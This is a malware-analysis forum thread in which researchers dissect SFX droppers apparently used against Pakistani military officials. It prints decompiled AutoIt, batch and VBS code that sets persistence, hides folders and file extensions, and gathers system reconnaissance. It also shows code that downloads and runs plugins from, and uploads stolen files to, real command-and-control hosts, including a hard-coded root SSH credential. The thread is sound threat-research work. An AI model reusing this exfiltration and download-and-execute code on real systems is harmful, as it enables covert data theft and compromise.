[R136a1]

After searching for some interesting malware samples on Threatexpert I stumbled across an interesting report:
http://www.threatexpert.com/report.aspx ... df8abd0cee

The dropper seems to be a self-extracting Winrar package. What took my attention was the dropped file "List of mujahideen launching department.xls" which obviously is the visible part after executing the package. I thought I make a little search with the names of the dropped files and it turns out there is more than one uploaded package. There are at least 6 samples which were all uploaded in May 2012:
http://www.threatexpert.com/reports.asp ... +&x=13&y=2

One of the packages contains a Word Document which is named "Military Training & Simulation Asia 2012 only one week away.doc":


If you read the content of the Word document it seems to be targeted to a general from Pakistan (package probably send by email).

Of course all this is just speculation right now

Sp if somebody has one of the following (or the dropped files - see reports) samples, please upload, so there is a chance to verify my assumption:

MD5: AD03593FBB4A85EDB31FA35332A27FFE
MD5: 831C0DB692E381762C71348DD018A213
MD5: 385EC526915CD9AF91794440C8EB6793
MD5: 740650982EF127C8CD25AC9AC081D41D
MD5: 6E468FE05786B1ABA656D1DF8ABD0CEE
MD5: 5F4F603801E6A87AE0262428C8DA39F2

[Xylitol]

6e468fe05786b1aba656d1df8abd0cee and 385ec526915cd9af91794440c8eb6793 in attach.

[R136a1]

My results of the 385ec526915cd9af91794440c8eb6793 package so far:

The file is a WinRAR self-extracting archive (.SFX) with a Microsoft Word icon to make it look like a ordinary Word document at first sight.
The commands of the archive are as follows:

• Path=C:\Windows\System\SecurityData\FilesData\ -> Where to install the files inside the archive
• SavePath –> To save the Path in registry for possible future use
• Setup=C:\Windows\System\SecurityData\FilesData\y.exe –> File to run after extracting
• Silent=1 –> Silent installation, so no windows pop up
• Overwrite=1 –> Overrite existing files without notification
• Update=U –> Extract only files which are not already present in target folder

The archive contains the following files:

• dhclient.exe – UPX packed AutoIt v3.3.6.1 script compiled executable
• ISAF.doc – Word document
• y.exe – UPX packed PureBasic executable

dhclient.exe
The file has a Time Stamp of „2010/04/16 Fr 07:47:33 UTC“. After unpacking the executable we can throw the compiled script into the AutoIt3 decompiler (http://www.exe2aut.com/). Look at the attachments for the decompiled Script. Further analysis to come...

ISAF.doc
Contains a story of the Indian Special Frontier Force. With a quick look at the meta data we can find the username „Neeraj“, who created this document.

y.exe
The file has a Time Stamp of „2010/11/08 Mo 13:12:07 UTC“. It creates the Batch file “y.bat“ in the Temp folder with the following content, executes it and then deletes it:

Code: Select all

@ echo off
@[HKEY_CLASSES_ROOT\batfile\shell\runas]
@="Run as Administrator" 
@ start "iexplore.exe" "C:\Windows\System\SecurityData\FilesData\ISAF.doc"
@ C:\Windows\System\SecurityData\FilesData\dhclient.exe
@ attrib C:\Windows +s +h
@ attrib c:\ApplicationData +s +h
@ exit

So it opens the ISAF.doc file, the dhclient.exe file and changes the attributes of the Windows and ApplicationData folders to „hidden“ and „system“.

[R136a1]

Brief analysis of dhclient.exe (AutoIt Script)

The Script contains a number of functions and constants at the beginning which are not used. Since I haven't any experience in AutoIt, I guess the standard "include" parts were used here. The actual important code is as follows:

Code: Select all

$a = _checkvm()
If NOT $a = "" Then Exit 
HttpSetUserAgent("Mozilla")
Global $uploaddir = "C:\ApplicationData\Prefetch\"
Global $workdir = "C:\ApplicationData\"
Global $host = "megadeals4u.net"
Global $port = "80"
Global $page = "Minerva/getmax.php"
Global $name = @ComputerName
Global $vars = "sysname=" & $name
Global $url = $page & "?" & _httpencodestring($vars)
Global $getallurl = "http://megadeals4u.net/Minerva/getall.php?sysname=" & $name
Global $getforme = "http://megadeals4u.net/Minerva/online.php?sysname=" & $name
Global $plugins = "http://megadeals4u.net/Minerva/plugins/"
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Predefined", "REG_SZ", @ScriptFullPath)
DirCreate($workdir)
DirCreate($uploaddir)
If @ScriptName = "notepad.com" Then Run("notepad.exe")
readhttp($getallurl)
While 1
	_uploadpath()
	Sleep(10000)
	readhttp($getforme)
	Sleep(60000)
WEnd
...

..._checkvm()
As you can see it first checks for VM presence, if so the script exits silently.

HttpSetUserAgent("Mozilla")
Then it sets the user-agent to "Mozilla Firefox".

Global $uploaddir = "C:\ApplicationData\Prefetch\"
Global $workdir = "C:\ApplicationData\"
...
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Predefined", "REG_SZ", @ScriptFullPath)
DirCreate($workdir)
DirCreate($uploaddir)
Thereafter multiple variables are set, e.g. "$workdir" and "uploaddir" are set to create the "C:\ApplicationData\..." folder whose attributes are later set to "hidden/system". As the name indicate the folder "C:\ApplicationData\Prefetch\" is used to store contents which later gets uploaded to the server. Also in registry the ordinary "Run" key is created with the name of the script as value.

Global $host = "megadeals4u.net"
Global $port = "80"
...
Global $plugins = "http://megadeals4u.net/Minerva/plugins/"
...
readhttp($getallurl)
Moreover various variables are filled with the server related part. To my surprise the server is still online, although the files date back to the year 2010. To conclude the operation is still ongoing...
Also as the variable "$plugins" indicate there are more components which can be installed from the server.

The readhttp() function:

Code: Select all

Func readhttp($url)
	Local $urllist
	Local $sdata = InetRead($url, 1)
	If $sdata = "" Then Return 
	$sdata = BinaryToString($sdata)
	$urllist = StringSplit($sdata, ";", 1)
	For $i = 1 To $urllist[0]
		$urllist[$i] = $plugins & $urllist[$i]
		If NOT FileExists($workdir & path2file($urllist[$i])) Then InetGet($urllist[$i], $workdir & path2file($urllist[$i]))
		If FileExists($workdir & path2file($urllist[$i])) Then Run($workdir & path2file($urllist[$i]), "", @SW_HIDE)
		$urllist[$i] = ""
	Next
EndFunc

Func path2file($path)
	Dim $szdrive, $szdir, $szfname, $szext
	$path = _pathsplit($path, $szdrive, $szdir, $szfname, $szext)
	Return $szfname & $szext
EndFunc

At the end of the code there is an endless loop which continuously uploads the content from the "C:\ApplicationData\Prefetch\" folder to the server:
While 1
_uploadpath()
Sleep(10000)
readhttp($getforme)
Sleep(60000)
WEnd

_uploadpath() function:

Code: Select all

Func _uploadpath()
	FileChangeDir($uploaddir)
	$search = FileFindFirstFile("*.*")
	If $search = -1 Then
		Return 
	EndIf
	While 1
		Sleep(1000)
		$file = FileFindNextFile($search)
		If @error Then ExitLoop 
		$socket = _httpconnect($host, $port)
		$get = _httppost_file($host, $url, $socket, $file, "filename")
		$recv = _httpread($socket, 0)
		If $recv = 1 Then FileDelete($file)
	WEnd
	FileClose($search)
	Return 
EndFunc

Func _httppost_file($host, $page, $socket = -1, $file = "", $fieldname = "")
	Dim $command
	If $socket == -1 Then
		If $_httplastsocket == -1 Then
			SetError(1)
			Return 
		EndIf
		$socket = $_httplastsocket
	EndIf
	$contenttype = _httppost_contenttype($file)
	$boundary = "------" & Chr(Random(Asc("A"), Asc("Z"), 3)) & Chr(Random(Asc("a"), Asc("z"), 3)) & Chr(Random(Asc("A"), Asc("Z"), 3)) & Chr(Random(Asc("a"), Asc("z"), 3)) & Random(1, 9, 1) & Random(1, 9, 1) & Random(1, 9, 1)
	$fileopen = FileOpen($file, 0)
	$fileread = FileRead($fileopen)
	FileClose($fileopen)
	$extra_commands = "--" & $boundary & @CRLF
	$extra_commands &= 'Content-Disposition: form-data; name="' & $fieldname & '"; filename="' & $file & '"' & @CRLF
	$extra_commands &= "Content-Type: " & $contenttype & @CRLF & @CRLF
	$extra_commands &= $fileread & @CRLF
	$extra_commands &= "--" & $boundary & "--"
	Dim $datasize = StringLen($extra_commands)
	$command = "POST /" & $page & " HTTP/1.1" & @CRLF
	$command &= "Host: " & $host & ":" & $port & @CRLF
	$command &= "User-Agent: " & $_httpuseragent & @CRLF
	$command &= "Content-Type: multipart/form-data; boundary=" & $boundary & @CRLF
	$command &= "Connection: Close" & @CRLF
	$command &= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" & @CRLF
	$command &= "Content-Length: " & $datasize & @CRLF & @CRLF
	$command &= $extra_commands
	Dim $bytessent = TCPSend($socket, $command)
	If $bytessent == 0 Then
		SetExtended(@error)
		SetError(2)
		Return 0
	EndIf
	SetError(0)
	Return $bytessent
EndFunc

Func _httppost_contenttype($file = "")
	$fileextension = StringRight($file, 4)
	Switch $fileextension
		Case ".txt"
			$contenttype = "text/plain"
		Case Else
			$contenttype = "application/octet-stream"
	EndSwitch
	Return $contenttype
EndFunc

[R136a1]

Summary for 385ec526915cd9af91794440c8eb6793

It is a WinRAR self-extracting archive which contains:

ISAF.doc
Visible part after execution

dhclient.exe
AutoIt compiled Script for uploading information or downloading plugins from server "http://megadeals4u.net/Minerva"

y.exe
Actual dropper for dhclient.exe and y.bat

y.bat
Opening ISAF.doc and executing dhclient.exe as Administrator

Conclusion

• The threat itself is quite simple, but nonetheless it may be still effective (see "Operation Shady RAT" or "The Luckycat Hackers")
• The used languages (AutoIt, PureBasic) for creating the executables were probably used to evade AV heuristics
• The binaries are from 2010, maybe since that time the package evolved in some way
• The server "megadeals4u.net" is still up and running thus indicating the operation is still ongoing
• The WinRAR self-extracting archive was probably sent by email and the receiver was fooled to open it by social engineering tricks (see MS Word icon)
• It seems like a political/military motivated attack, since the "ISAF.doc" file contains that topic

If some AV guys see this:
Maybe you are interested in the threat and want to help us getting more information (Server, target, ...).

[R136a1]

My analysis for the 6e468fe05786b1aba656d1df8abd0cee package

At first sight the file is also a self-extracting archive (.SFX) which can be unpacked with a common file archiver. You can actually open the archive and see the content, but after several unsuccessful attempts to extract the files (7-Zip, WinRAR, IZArc) I began to realize it was packed with some "special" tool. By looking at the Strings in IDA Pro I found the corresponding hint "This Zip has been encrypted with Chilkat Zip (http://www.chilkatsoft.com)". After visiting the Website I found the tool which was probably used (http://www.chilkatsoft.com/chilkatsfx.asp).
Now what is so special about this tool?
It cannot be unpacked with common tools like WinZip, WinRAR, 7-Zip, ... because of its extraordinary technique:

Chilkat’s Self-Extracting EXE Format

The internal format of the self-extracting EXE’s produced by Chilkat Zip’s WriteExe method, or by the Zip-2-Secure-EXE utility program is (at this point) proprietary and undocumented. Chilkat decided against using a .zip file format internal to the EXE for two reasons: complexities due to 64-bit size issues, and complexities/limitations involving Unicode filenames. The undocumented Chilkat format is a very simple compressed streaming file format (more similar to TAR, but with compression and far simpler) with no limitations on file sizes, number of files, Unicode filenames, etc. It also self-optimizes by compressing files in chunks. If a file does not compress well after the first few chunks (such as with already-compressed format such as JPG, PDF, etc.) then it will suppress compression for a time and re-sample periodically to see if compression should resume or not. The intent is to get the best trade-off automatically between compression and performance.
A self-extracting EXE created by Chilkat Zip, or by Chilkat’s Zip-2-Secure-EXE utility program cannot be opened by WinZip, 7-Zip, or any other “zip” tool, including Chilkat Zip. (Chilkat may in the future add functionality to “open-and-extract” a Chilkat-created self-extracting EXE.)

Source: http://www.cknotes.com/?p=351

This was new to me, so I had to catch the files with dynamic analysis:

Execution of 6e468fe05786b1aba656d1df8abd0cee.exe
It drops the file "List of mujahideen launching department.xls.exe" in the (created) folder "c:\documents And settings\<user>\local settings\temp\ckz_FN0L" and executes it. After "List of mujahideen launching department.xls.exe" execution is finished it gets deleted.

List of mujahideen launching department.xls.exe
The file is packed with UPX and is a WinRAR self-extracting archive (.SFX) similar to the archive we had before (see 385ec526915cd9af91794440c8eb6793 analysis).
This time the commands are as follows:

• Path=C:\Windows\manager\servce\task\ -> Where to install the files inside the archive
• SavePath –> To save the Path in registry for possible future use
• Setup=C:\Windows\manager\servce\task\hr.vbs –> File to run after extracting
• Silent=1 –> Silent installation, so no windows pop up
• Overwrite=2 –> Existing files will not be overritten!

It contains the following files:

• hr.vbs
  Executes the file "lucky.exe" and sets "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" and "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt" to the values "2" thus make file extensions and hidden files/folders invisible.
  Code: Select all

  Set WshShell = CreateObject("WScript.Shell")
  WshShell.Run chr(34) & "c:\Windows\manager\servce\task\lucky.exe" & Chr(34), 0
  Set WshShell = Nothing
  Dim WshShell
  Set WshShell = WScript.CreateObject("WScript.Shell")
  WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD"
  WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 2, "REG_DWORD"
  WScript.Quit

• List of mujahideen launching department.xls
  A simple MS Excel Document with a few random names, nothing interesting. The metadata shows the authors name is "Satark".
• lucky.exe
  Creates the file "lucky.bat" in folder "c:\documents And settings\<user>\local settings\temp\<number>D.Temp\" and executes it. After execution lucky.bat and the folder "<number>D.Temp" get deleted
• lucky.bat
  Opens "List of mujahideen launching department.xls" and executes "dhclient.exe". Thereafter it sets the attributes of the folders "c:\Windows\manager\servce\" and "c:\recycler" to hidden/system.
  Then it deletes the file "storage-mozStorage.js" from Firefox.
  Moreover it executes the Windows tools systeminfo.exe and ipconfig.exe and writes the results into textfiles in folder "c:\Recycler\cache\". This seems to be an implementation mistake, since the folder "cache" was not created before and the output with ">" only works if the folder exists. But the path "c:\Recycler\cache\1Systeminfo.txt" reveals some additional interesting discoveries (see next post).
  Code: Select all

  @ echo off
  @[HKEY_CLASSES_ROOT\batfile\shell\runas]
  @="Run as Administrator" 
  @ start "iexplore.exe" "c:\Windows\manager\servce\task\List of mujahideen launching department.xls"
  @ c:\Windows\manager\servce\task\dhclient.exe
  @ attrib c:\Windows\manager\servce\ +s +h
  @ attrib c:\recycler +s +h
  del /q "C:\Program Files\Mozilla Firefox\components\storage-mozStorage.js"
  systeminfo > c:\Recycler\cache\1Systeminfo.txt
  ipconfig /all > c:\Recycler\cache\1ip.txt
  @ exit

• dhclient
  Exactly the same file as described above, except it contacts the server at http://shopingcard.net/ respectively http://shopingcard.net/boot/

[R136a1]

So it turns out that my assumption "The binaries are from 2010, maybe since that time the package evolved in some way" was correct.
By using the path (c:\Recycler\cache\1<xxx>) from the latest analyzed Batch file (lucky.bat) for searching purposes I found multiple other similar threats:

Link: http://www.threatexpert.com/reports.aspx?page=4&find=c%3A\RECYCLER\Cache\

A quick MD5 search in Virustotal showed some of the files have a Time Stamp from year 2011, so they are probably the advancement of the files from 2010 (see above).

So if somebody has one or more of the following files (MD5), please upload:

024d2d8c2f570a7226c99745c8530069
dc33473683dc363f70aed095f82acd64
c4bffb0a306de8a95d22cbcd6cc80aca
f1b3eac9e238bf48aacf0181115a661e
d6febfb1cbaabf224ec38ac3f94d16ea
ccba70cf594167fa0826e98f59316d65
38a43baebbac6294ba70555894c9cedb
91923db0b59e8b801acb1c956ac9c217
3cbbe77341918f174c55f5bf4a43dfd2
b9f0e10662de125be77f1948716ab35f
f7c5e17c78cacf9a33112e934c7e9c97
79d16ee4188a26fd5961f6da8cfae88b
36cfa75d19dc1a114bd45ad458b8dd8b
8ded97877d1c6eabe0c596adddf87113
611f5f205a1357a3b46d5ba45880cb35
28d20e926143f46b78a92f85f8fdab78
feea1d25bcad347142d662a8c08f40fa
39a89c8d0e10b008beb70c8021831b4c
9c2cbffe66d47726b5486585c5ae8931
6f141aee24c3926935dd52dfd48bb9ac
176fde7b8d3b1b206cde510515263af1
bfd2c8f9dcc67469ca67a42fabdb46ff
0f3877bba400126d042099015c55bf55
f50215f68e91ce76d6e9dcc641173add
69f1ecd201b518939d371c1936a2e3b8
49a898699e025f44666dce37ced11e96
fc42d0fa4a4ef2e3822c49075b1d35e7
054cc6d9c546eff6500681c70fcfb960
6a44141ceafac91729cf78a147f1022a
052c2a4b35570193d85bae59f84f0a6c
0dacf7914a035975facc18a198cc02b9
14af1eb70053cf692087488dbee4833e
37309e147157c7c52a28d9bd5cacdba1
77c02df1a0943c47360ab80ee47effab
1047999d886b319f8bd045c27d52031e
afc2962d640cc7bc2d6533710e9b596c
d0bda03df058918bc2b5654a2cce689b
4e2ba020172700df009b318f28bee5a5
a883f76e9aaa9cc24c636bbfc4b4510e
938ff9625b2cee233d4d0fa3f56d1115
19e7407c90d0b3fe2289f18bc811310b
333879eb5f18de8b52a539ecb4f7a720
d74b1c18c8e3143bfb3ae232a74bcbb9
4675e57054bb70318c606371b8eae824
cd55e978391ecf00ec15bbee7b7e0185
5cc4d0788585c540dec5aa18447a712b
a7203acb6d8082113aae606c0475f311
6a9cf70a311203f86fcc4d82dae7a30f
4b7adbb47566916be158d427315fa25d
d82c54227f7588edec552ba27a91bf70
4e42b4524f11f9cbd2a56a77c48375dc
1fd1c397803e11dcf9cee8d2e26df597
121e7a8e3f03aefbb30c8c09ffa732a6
4d33262a1e7dfbe43a602fd490e9e703
5e48898af795add7e33f9d046efa5136
77abf9fceba7dbaae6d1bbcb63a0e290
1af67ffa12400c17b25ca8349463adb1
ccb6387918c4ec254eeeb2a0db669ae8
4aab176d26668bdd6be34a2898ec7b1b
3a20886792bc230cc9c60fdc49c5d10d
845bf8add60a973df504fce2bac9174f
73afbc0e066406f03770e3a31ef6b71d
24728321da3e17ab1336c9b4978f6d62
92727121661ff8aba1599e7799415a8a
a39518dfa9eb7a3b96a4ba1d77d9b27f
5040a1164ab28be8ac26658ecfda6f6a
6819c45a352cbc3c6418fb30898b8a69
40a7175a6882260d56a1339d9a1111f5
d67209c59d64e2f6595ba8af512a978b
73b1f251e392abcf3652f13958654069
93f425c208c51a8d22b823037c96577d
3811fcdb9f34842844d4455c12648717
557397d7d8d18c820f7e2de236581eb2
ddf1e2d8fa1b2363d0ae8b5682165ae8
7183edc520bf59d5528d24c5cb922ff3
996a15b9f32933b53315532ca5d5f6ca
11dc88fb363d6f08103661e70836a107
f22b6e1c6bdcdc66598f29ec8e454f22
4c89bfadce0687bdb7478fdec917cf88

[rkhunter]

dc33473683dc363f70aed095f82acd64
79d16ee4188a26fd5961f6da8cfae88b

[R136a1]

Let's analyze dc33473683dc363f70aed095f82acd64 (DnsSvc.exe)

1) Information Gathering

• Hex Editor
  - There is now "Rich" header, so no Microsoft compiler was used
  - By looking at the section names we see ".bss" section. I personally know only Delphi which uses this name, but Delphi creates more sections than we have here. Conclusion is we have some "uncommon" compiler here.
  - We see many (interesting) strings in cleartext, so no string obfuscation was used
  - The strings ".../gcc/gcc/config/i386/w32-shared-ptr.c", "gnu_exception_handler..." and "..._mingw_CRTStartup..." indicate the MinGW developer environment was used to build the file
• PE Editor
  - Time Date Stamp "2011/09/19 Mo 09:27:05 UTC"
  - No resource section, so it's unlikely that it contains some files to drop
  - Import Table (some interesting functions): FindFirstFile, FindNextFile , GetComputerName (kernel32.dll); RegOpenKeyEx, RegSetValueEx (advapi32.dll); WSASTartup, gethostbyname, connect, htons, recv, send, socket (wsock32.dll)
  - PEiD says (and we trust it): "Dev-C++ 4.9.9.2 -> Bloodshed Software [Overlay]"

  Bloodshed Dev-C++ is a full-featured Integrated Development Environment (IDE) for the C/C++ programming language. It uses Mingw port of GCC (GNU Compiler Collection) as it's compiler.

  - PEiD says: Subsystem = Win32 console
  - PEiD PlugIn Krypto ANALyzer (KANAL v.2.92) says: "No known crypto signatures found"

2) Static analysis (IDA Pro 5.0 free)
Strings:

Code: Select all

C:\\recycler\\cache\\                                        
md C:\\recycler\\cache\\                                     
copy DnsSvc.exe C:\\recycler\\                               
Software\\Microsoft\\Windows\\CurrentVersion\\Run            
My Directry8                                                 
connecting to server\n                                       
momate.net                                                   
not connected with momate\n                                  
connected\n                                                  
MachineGuid                                                  
SOFTWARE\\Microsoft\\Cryptography\\                          
Computer Name: %s\n                                          
cName==%s\n                                                  
_data                                                        
%s%s%s                                                       
s=%d                                                         
Error                                                        
susnata                                                      
r====%d\n                                                    
exe1====%s                                                   
C:\\recycler\\                                               
%s%s                                                         
buffer==%s\n                                                 
size===%d\n                                                  
exe data receiving over\n                                    
===========///////////============\n                         
Clientmgr.exe                                                
attrib +h C:\\recycler\\Clientmgr.exe                        
Clientmgr copied\n                                           
open                                                         
---------------///-------------\n                            
.........out of while............\n                          
--------------------------------------------------------\n   
attrib +h C:\\recycler\\Clientmgr.ini                        
==scan finished==\n                                          
not connected  \n                                            
dest====%s\n                                                 
C:\\recycler\\cache\\*.*                                     
file %s\n                                                    
c1===%s\n                                                    
exit                                                         
/home/momate/domains/momate.net/public_html/HTTP/            
put c:\\recycler\\cache\\                                    
option batch continue                                        
/command                                                     
ssh-rsa 2048 a5:05:93:ae:ac:26:6b:6b:1c:2f:14:07:46:67:56:9e 
/hostkey=                                                    
root:Iy7@@g5$$#N@momate.net                                  
c:\\recycler\\Clientmgr.exe                                  
%s %s %s%c%s%c %s %c%s%c %c%s%c%c%s%c%c %s%s%c%c %s          
win===%s\n                                                   
done\n                                                       
C:\\recycler\\cache\\                                        
%s %s%c%s%c                                                  
ccc====%s\n                                                  
no===\n                                                      
==scan end===\n                                              
w32_sharedptr->size == sizeof(W32_EH_SHARED)                 
%s:%u: failed assertion `%s'\n                               
../../gcc/gcc/config/i386/w32-shared-ptr.c                   
GetAtomNameA (atom, s, sizeof(s)) != 0

Code:
Part 1 - Setup and contacting
First of all the program creates the folder "C:\recycler\cache\" and copies itself (DnsSvc.exe) into it. What is noticeable is that is uses commands by calling the C++ system() function namely "md" (make directory) and "copy". The use of commands can be observed throughout the whole code.
Thereafter it creates an Autorun key "My Directry8" in "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" with the value "C:\recycler\DnsSvc.exe".


Figure 1: Installation routine

Now it initiates the use of the Winsock DLL with WSAStartup() function. If it succeeds the code continues, otherwise the program exits.
By calling the socket() function it creates a socket. Then it creates a "sockaddr" structure and fills it subsequently with the appropriate values which later is required for the connect() function. So it calls the htons() function to convert the hex value "0x6A4" (1700 decimal -> Port) from host to TCP/IP network byte order. Afterwards it constantly tries to get a "hostent" structure from the host h**p://momate.net by using the gethostbyname() function.
If it was successful a follow up function (Part 2) is called, otherwise it sleeps for 5 seconds and the loop continues to resolve the host.

Part 2 - File download
First it fills the last entry of the "sockaddr" structure with the pointer to the IP adress(es) resolved with the "gethostbyname" function. Then it connects to the host "momate.net" by calling the connect() function. It if fails to connect it ends up in the loop described at the end of Part 1, otherwise it continues.
By calling the SHGetValue() function the program gets the "MachineGUID" from the registry path "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\". This Globally Unique Identifier is combined with the Computer Name by calling the GetComputerName() and strcat() functions. After this by calling the sprintf() function it creates the string "C:_<MachineGUID+ComputerName>_data" and stores it into a buffer for later use (see Part 3).
Then it sends a 500 bytes of data with send() function to the host (momate.net) containing the string "<MachineGUID+ComputerName". Thereon it receives 50 bytes of data with recv() function and stores it into another buffer. The data inside this buffer is compared to the string "susnata" thus checking if the Computer is already infected and the "Clientmgr.exe" tool (see below) was already downloaded.


Figure 2: Comparison of server response

If this is not the case the program creates a binary file with fopen() function in "C:\recycler\" folder. Then it receives from the host 10 bytes of data which contains the size of the binary as string. The string gets converted into an integer by calling the atoi() function and then used as a counter for the following loop.
The loop starts with receiving a byte and storing it into a buffer. This byte gets immediately written to the binary file with fwrite() function. Afterwards the buffer is overriten with "0", the file size gets decreased and the loop continues. After the whole binary data was received the file gets closed with fclose() function and gets executed with ShellExecute() function.
Then again it receives the 50 bytes of data (loop) and stores it into the same buffer as above. This time the "susnata" comparison ends up in the new location where the program sleeps for 5 seconds, sets the (after file execution created) file attribute of "Clientmgr.ini" to hidden and jumps into the follow up function (Part 3).

Part 3 - File upload
Here the program scans the folder "C:\recycler\cache\" for files by using FindFirstFile() function. If successful, the program continues, otherwise FindClose() is called and execution flow ends up in loop of Part 2.
Now the downloaded "Clientmgr.exe" program of Part 2 gets executed with a quite long list of parameters:
Clientmgr.exe root:Iy7@@g5$$#N@momate.net /hostkey="ssh-rsa 2048 a5:05:93:ae:ac:26:6b:6b:1c:2f:14:07:46:67:56:9e" /command "option batch continue" "put c:\\recycler\\cache\\""<NameOfFileToBeUploaded>"" /home/momate/domains/momate.net/public_html/HTTP/C:_<MachineGUID+ComputerName>_data/" exit


Figure 3: Execution of Clientmgr.exe

Its obvious that the file from folder c:\recycler\cache\ gets uploaded to the host with the help of the downloaded SSH Client tool (Clientmgr.exe). Unfortunately I wasn't able to get a copy of this program, so I can't tell if it is a public or private tool. Although the server is still up and running, it isn't responding to the DnsSvc.exe query, thus indicating the Scripts were removed.


Figure 4: DnsSvc.exe connection (patched to show console)

After a successful upload the string "aa" is send by calling send() function and the uploaded file gets deleted from folder "C:\recycler\cache\". Then the next file (if present) gets uploaded in the same way as described.

Server:
A whois query for momate.net reveals the following information, thus indicating the server was probably hacked.

Code: Select all

Domain Name: MOMATE.NET 

Registrant:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Creation Date: 23-Jul-2011  
Expiration Date: 23-Jul-2012

Domain servers in listed order:
    ns1.suspended-domian.com
    ns2.suspended-domian.com

Administrative Contact:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Technical Contact:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Billing Contact:
    Faygo-Connections
    Amanda Ramada        (amanda.ramada@hotmail.com)
    H-147 , park lane 
    street 14-b
    South Block
    California State San Marcos
    California,92096
    US
    Tel. +1.41512355236

Status:LOCKED

3) Conclusion

• The executable is easy and straight forward to reverse, because of its small size and missing obfuscation
• The executable was created as console application (hidden) with many printf() function calls inside for information/debugging purposes, so its easy to follow execution flow
• The binary executes alot of its tasks with the help of system commands, maybe to prevent AV heuristic detection, maybe the author has just a low skill level, who knows...
• The binary DnsSvc.exe is just a part of the whole infection, because the component which copies the files to "C:\recycler\cache\" folder is missing (see also http://www.threatexpert.com/report.aspx ... 48716ab35f)
• The server momate.net is up and running, but not responding to the DnsSvc.exe requests thus indicating the operation ended and the responding PHP Scripts where removed
• Other servers from the same operation are also down: h**p://greenpeacesite.com, h**p://www.secure.vendetta-series.info, h**p://www.polarfargo.net

-> End of the game

Really?

Not necessarily! Let's see, I found a server which is still running...

To be continued...

[R136a1]

Game over

The server barneys-versions.net which I hoped to get some information is also down or more accurately the responding PHP Scripts were removed. I am too lazy to analyze the remaining package in particular the file "download_and_execute.exe" (see below), but the files are attached.
The package is again a WinRAR self-extracting executable with the following files inside:

• abc.xls
• Allinone.bat
• download_and_execute.exe
• s_wine_flu.bat
• s_wine_flu.vbs

Execution flow:
s_wine_flu.vbs -> s_wine_flu.bat -> abc.xls + download_and_execute.exe

Files:
s_wine_flu.vbs

Code: Select all

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "c:\Windows\System32\Usermf\userm\s_wine_flu.bat" & Chr(34), 0
Set WshShell = Nothing

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD"

WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 2, "REG_DWORD"

WScript.Quit

s_wine_flu.bat

Code: Select all

@ echo off
@[HKEY_CLASSES_ROOT\batfile\shell\runas]
@="Run as Administrator" 
@ start "iexplore.exe" "c:\Windows\System32\Usermf\userm\abc.xls"
@ c:\Windows\System32\Usermf\userm\download_and_execute.exe
@ attrib c:\Windows\System32\Usermf\ +s +h
@ attrib c:\recycler +s +h
@ attrib c:\Windows\System32\Usermf\Allinone.bat
del /q "C:\Program Files\Mozilla Firefox\components\storage-mozStorage.js"

systeminfo > c:\Recycler\cache\1Systeminfo.txt

ipconfig /all > c:\Recycler\cache\1ip.txt

@ exit

Allinone.bat

Code: Select all

dir /a /s C:\ > c:\recycler\cache\1C.txt
dir /a /s D:\ > c:\recycler\cache\1D.txt
dir /a /s E:\ > c:\recycler\cache\1E.txt
dir /a /s F:\ > c:\recycler\cache\1F.txt
dir /a /s G:\ > c:\recycler\cache\1G.txt
dir /a /s H:\ > c:\recycler\cache\1H.txt
dir /a /s I:\ > c:\recycler\cache\1I.txt
dir /a /s J:\ > c:\recycler\cache\1J.txt
ipconfig /all > c:\Recycler\cache\1ip.txt
net start > c:\Recycler\Cache\1Services.txt
systeminfo > c:\Recycler\cache\1Systeminfo.txt
net view > c:\recycler\cache\1Netview.txt
pathping google.com > C:\RECYCLER\cache\1Ping.txt
tracert google.com > c:\RECYCLER\cache\1Tracert.txt
route print > c:\RECYCLER\cache\1Route.txt
attrib +s +h C:\Recycler\

abc.xsl


Conclusion
The metadata of the MS Office documents indicate that the attackers come from India and the targets were officials (military/politicians/...) from Pakistan. Of course this is just speculation since hard facts are not available.

Thanks goes to Xylitol for providing the sample.